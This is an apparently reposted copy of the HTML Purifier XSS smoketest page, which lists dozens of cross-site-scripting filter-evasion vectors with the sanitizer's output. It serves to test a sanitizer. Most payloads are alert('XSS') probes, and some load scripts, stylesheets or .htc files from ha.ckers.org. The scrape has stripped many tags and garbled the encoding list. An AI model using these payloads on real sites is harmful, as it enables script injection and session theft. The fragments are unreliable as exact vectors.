Tuesday, June 7, 2016

HTML Purifier XSS Attacks Smoketest ( http://htmlpurifier.org/live/smoketests/xssAttacks.php)

HTML Purifier XSS Attacks Smoketest

XSS attacks are from http://ha.ckers.org/xss.html.
Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.

Test

Name	Raw	Output	Render
XSS Locator	';alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//-->

» CRIPT>">'>» >

SCRIPT w/Source File

SCRIPT w/Char Code

BASE

»

HREF="javascript:alert('XSS' » );//">

BGSOUND

»

SRC="javascript:alert('XSS') » ;">

BODY background-image

»

BACKGROUND="javascript:alert » ('XSS');">

BODY ONLOAD

DIV background-image 1

»

STYLE="background-image: » url(javascript:alert('XSS')) » ">

DIV background-image 2

»

STYLE="background-image: » url(javascript:alert('XS » S'))">

DIV expression

»

expression(alert('XSS'));">

FRAME

»

SRC="javascript:alert('XSS') » ;">

IFRAME

&#187;</span>
SRC="javascript:alert('XSS') <span class="linebreak">&#187;</span>
;">

INPUT Image

»

SRC="javascript:alert('XSS') » ;">

IMG w/JavaScript Directive

»

SRC="javascript:alert('XSS') » ;">

IMG No Quotes/Semicolon

»

SRC=javascript:alert('XSS')>

IMG Dynsrc

»

DYNSRC="javascript:alert('XS » S');">

IMG Lowsrc

»

LOWSRC="javascript:alert('XS » S');">

IMG Embedded commands 1

»

SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode">

»

src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" />

IMG STYLE w/expression

exp/*»

STYLE='no\xss:noxss("*//*"); » xss:ex/*XSS*//*/* » /pression(alert("XSS"))'>

exp/*

exp/*

List-style-image

XSS

XSS

IMG w/VBscript

»

SRC='vbscript:msgbox("XSS")' » >

LAYER

»

SRC="http://ha.ckers.org/scr » iptlet.html">

Livescript

»

SRC="livescript:[code]">

US-ASCII encoding

scriptalert(XSS)/script »

scriptalert(XSS)/script

scriptalert(XSS)/script

META

»

CONTENT="0;url=javascript:al » ert('XSS');">

META w/data:URL

»

CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K">

META w/additional URL parameter

»

CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');">

Mocha

OBJECT

OBJECT w/Embedded XSS

Embed Flash

»

SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED>

STYLE

STYLE w/Comment

»

STYLE="xss:expr/*XSS*/ession » (alert('XSS'))">

STYLE w/Anonymous HTML

»

STYLE="xss:expression(alert( » 'XSS'))">

STYLE w/background-image

»

CLASS=XSS>

STYLE w/background

Stylesheet

»

HREF="javascript:alert('XSS' » );">

Remote Stylesheet 1

»

HREF="http://ha.ckers.org/xs » s.css">

Remote Stylesheet 2

Remote Stylesheet 3

»

Content="» g/xss.css>; REL=stylesheet">

Remote Stylesheet 4

TABLE

»

BACKGROUND="javascript:alert » ('XSS')">

TD

»

BACKGROUND="javascript:alert » ('XSS')">

XML namespace

»

namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> X » SS

<?import namespace="xss" »
implementation="http://ha.ck »
ers.org/xss.htc">
XSS

XSS

XML data island w/CDATA

»

ID=I><![CDATA[» SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> » » DATAFLD=C DATAFORMATAS=HTML>

<IMG »
SRC="javascript:alert('XSS') »
;">

XML data island w/comment

»

SRC="javascript:alert('XSS')">< » /I> » DATASRC="#xss" DATAFLD="B" » DATAFORMATAS="HTML">

»

alt="javascript:alert('XSS')" » />

XML (locally hosted)

»

SRC="http://ha.ckers.org/xss » test.xml" ID=I> » DATASRC=#I DATAFLD=C » DATAFORMATAS=HTML>

XML HTML+TIME

»

prefix="t" » ns="urn:schemas-microsoft-co » m:time"> » namespace="t" » implementation="#default#tim » e2"> » attributeName="innerHTML" » to="XSS" » >

<?xml:namespace »
prefix="t" »
ns="urn:schemas-microsoft-co »
m:time">

<?import »
namespace="t" »
implementation="#default#tim »
e2">

Commented-out Block

Cookie Manipulation

»

HTTP-EQUIV="Set-Cookie" » Content="USERID=">

Local .htc file

»

url(http://ha.ckers.org/xss. » htc);">

Rename .js to .jpg

SSI

PHP

»

echo('aler » t("XSS")'); ?>

<? echo('alert("XSS")'); »
?>

JavaScript Includes

Character Encoding Example

<
%3C
&lt
<
&LT
<
&#60 »

&#060
&#0060

&#00060
&#000 »
060
&#0000060
<
<
& »
#0060;
<
<
&# »
0000060;
&#x3c
&#x03c
&#x003 »
c
&#x0003c
&#x00003c
&#x0000 »
03c
<
<

< »

<
<
&#x000 »
003c;
&#X3c
&#X03c
&#X003c
& »
#X0003c
&#X00003c
&#X000003c »

<
<
<
&#X »
0003c;
<
&#X000003c »
;
&#x3C

&#x03C
&#x003C
&#x0 »
003C
&#x00003C
&#x000003C
&# »
x3C;
<
<
&#x000 »
3C;
<
<
& »
#X3C
&#X03C
&#X003C
&#X0003C »

&#X00003C
&#X000003C

&#X3C »
;
<
<
< »

<
<
\x3c »

\x3C
\u003c
\u003C

<
%3C
&lt
<
&L »
T
&LT;
<
<
<

& »
lt;
<
<
<
<
< »

<
<
<
<
<
&l »
t;
<
<
<
<
<
 »

<
<
<
<
<
&l »
t;
<
<
<
<
<
 »
<
<
<
<
<
&lt »
;

<
<
<
<
<
 »
<
<
<
<
<
&lt »
;
<
<
<
<
<
& »
lt;

<
<
<
<
&lt »
;
<
\x3c
\x3C
\u003c
\u00 »
3C

< %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C

Case Insensitive

»

SRC=JaVaScRiPt:alert('XSS')>

HTML Entities

»

SRC=javascript:alert("X » SS")>

Grave Accents

»

SRC=`javascript:alert("RSnak » e says, 'XSS'")`>

»

src="%60javascript%3Aalert(" » alt="`javascript:alert(&quot » ;RSnake" />

Image w/CharCode

»

SRC=javascript:alert(String. » fromCharCode(88,83,83))>

UTF-8 Unicode Encoding

»

SRC=java&# » 115;crip& » #116;:ale& » #114;t('X&# » 83;S')>

Long UTF-8 Unicode w/out Semicolons

»

SRC=&#0000106&#0000097&#0000 » 118&#0000097&#0000115&#00000 » 99&#0000114&#0000105&#000011 » 2&#0000116&#0000058&#0000097 » &#0000108&#0000101&#0000114& » #0000116&#0000040&#0000039&# » 0000088&#0000083&#0000083&#0 » 000039&#0000041>

DIV w/Unicode

»

STYLE="background-image:\007 » 5\0072\006C\0028'\006a\0061\ » 0076\0061\0073\0063\0072\006 » 9\0070\0074\003a\0061\006c\0 » 065\0072\0074\0028.1027\0058 » .1053\0053\0027\0029'\0029">

Hex Encoding w/out Semicolons

»

SRC=&#x6A&#x61&#x76&#x61&#x7 » 3&#x63&#x72&#x69&#x70&#x74&# » x3A&#x61&#x6C&#x65&#x72&#x74 » &#x28&#x27&#x58&#x53&#x53&#x » 27&#x29>

UTF-7 Encoding

»

HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » +ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4-

+ADw-SCRIPT+AD4-alert('XSS') »
;+ADw-/SCRIPT+AD4-

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

Escaping JavaScript escapes

\";alert('XSS');//

\";alert('XSS');//

\";alert('XSS');//

End title tag

STYLE w/broken up JavaScript

Embedded Tab

»

SRC="jav\tascript:alert('XSS' » );">

»

src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />

Embedded Encoded Tab

»

SRC="jav ascript:alert( » 'XSS');">

»

src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />

Embedded Newline

»

SRC="jav ascript:alert( » 'XSS');">

»

src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />

Embedded Carriage Return

»

SRC="jav ascript:alert( » 'XSS');">

»

src="jav%20ascript%3Aalert(' » XSS');" alt="jav » ascript:alert('XSS');" />

Multiline w/Carriage Returns

»

p t : a l e r t ( ' X S S ' » ) " >

»

src="j%20a%20v%20a%20s%20c%2 » 0r%20i%20p%20t%20%3A%20a%20l » %20e%20r%20t%20(%20'%20X%20S » %20S%20'%20)" alt="j a v a s » c r i p t : a l e r t ( ' X » S" />

Null Chars 1

»

SRC=java\0script:alert("XSS") » >

Null Chars 2

&\0

IPT>alert("XSS")\0 » IPT>

Spaces/Meta Chars

»

javascript:alert('XSS');">

Non-Alpha/Non-Digit

Non-Alpha/Non-Digit Part 2

»

onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")>

No Closing Script Tag

Evade Regex Filter 1

Evade Regex Filter 2

Evade Regex Filter 3

Evade Regex Filter 4

Evade Regex Filter 5

Filter Evasion 1

PT »
SRC="http://ha.ckers.org/xss »
.js">

PT »
SRC="http://ha.ckers.org/xss »
.js">

PT SRC="http://ha.ckers.org/xss.js">

Filter Evasion 2

IP Encoding

»

HREF="http://66.102.7.147/"> » XSS

»

href="http://66.102.7.147/"> » XSS

XSS

URL Encoding

»

HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS

XSS

XSS

Dword Encoding

»

HREF="http://1113982867/">XS » S

XSS

XSS

Hex Encoding

»

HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS

XSS

XSS

Octal Encoding

»

HREF="http://0102.0146.0007. » 00000223/">XSS

XSS

XSS

Mixed Encoding

»

HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS

»

href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS

XSS

Protocol Resolution Bypass

»

HREF="//www.google.com/">XSS »

XSS

XSS

Firefox Lookups 1

XSS

XSS

XSS

Firefox Lookups 2

»

HREF="http://ha.ckers.org@go » ogle">XSS

»

href="http://google">XSS

XSS

Firefox Lookups 3

»

HREF="http://google:ha.ckers » .org">XSS

»

href="http://google">XSS

XSS

Removing Cnames

»

HREF="http://google.com/">XS » S

XSS

XSS

Extra dot for Absolute DNS

»

HREF="http://www.google.com. » /">XSS

XSS

XSS

JavaScript Link Location

»

HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS

XSS

XSS

Content Replace

»

HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A>

»

href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a>

XSS

BLACK MASK

Tuesday, June 7, 2016